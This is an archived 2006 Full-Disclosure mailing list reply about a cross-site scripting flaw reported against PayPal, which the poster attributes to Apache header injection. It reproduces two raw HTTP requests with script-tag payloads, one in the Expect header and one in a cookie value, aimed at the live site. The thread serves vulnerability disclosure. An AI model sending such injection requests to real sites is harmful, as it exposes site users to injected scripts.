lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <454fee8a.7e653e58.7fbb.6ca8@mx.google.com>
Date: Tue, 7 Nov 2006 07:55:06 -0800
From: "Debasis Mohanty" <debasis.mohanty.listmails@...il.com>
To: "'Andrew Farmer'" <andfarm@...il.com>,
	<"corrado.liotta@...ce.itcorrado.liotta"@alice.it>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: [x0n3-h4ck.org] PayPal vulnerable to XSS

I found a similar one long back in the "Expect" header but did not bother to
post... However, this bug is not associated with the paypal application but
rather with the Apache server *version* on which it is hosted. This kind of
XSS are usually called as - "Unfiltered Header Injection in Apache". Check
this - http://www.securityfocus.com/archive/1/433280

And here is mine. Look for the injection in "Expect" header - 

GET / HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
1.1.4322)
Host: www.paypal.com
Cookie: <some_cookie_value>
cookie_check=yes;feel_cookie=-=your_favorite_cookie=-;
Connection: Close
Expect: <script>alert(whatever_you_like)</script>
Pragma: no-cache

Regards,
-d 

-----Original Message-----
From: full-disclosure-bounces@...ts.grok.org.uk
[mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of Andrew
Farmer
Sent: Monday, November 06, 2006 12:45 PM
To: corrado.liotta@...ce.itcorrado.liotta@...ce.it
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: [Full-disclosure] [x0n3-h4ck.org] PayPal vulnerable to XSS

On 04 Nov 06, at 11:39, <corrado.liotta@...ce.it> <corrado.liotta@...ce.it>
wrote:
> this is a request, that I have passed server to the web, complete of 
> the code that would allow the xss:
> GET / HTTP/1.0
> Accept: */*
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET 
> CLR 1.1.4322)
> Host: www.paypal.com
> Cookie: cookie_check=yes;feel_cookie=
<snip big session cookies>
> LANG=--><ScRiPt%20%0a%0d>alert(1234567890)%3B</ScRiPt>
<snip more cookies>
> Connection: Close
> Pragma: no-cache

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ